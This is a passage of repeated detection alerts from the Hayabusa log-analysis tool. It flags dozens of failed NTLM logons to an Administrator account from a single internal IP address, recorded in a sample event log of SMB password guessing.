: AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9ikrtTGcZYU1556 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ypyd6SagvUXQHhtZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWS37lIJ3Q6ghgMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H211KmFImpBRwTGW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64tO5iBehXQcNc49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xvxDngRj3j5TAwST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8VYRjMnxDgUTWYf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:39.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhWphTesbUf0hwi1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MO8VRRVANxIkDzEX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.429 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ziSXANiDAf7LRFz5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g0CvYYtyEcU2riBX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
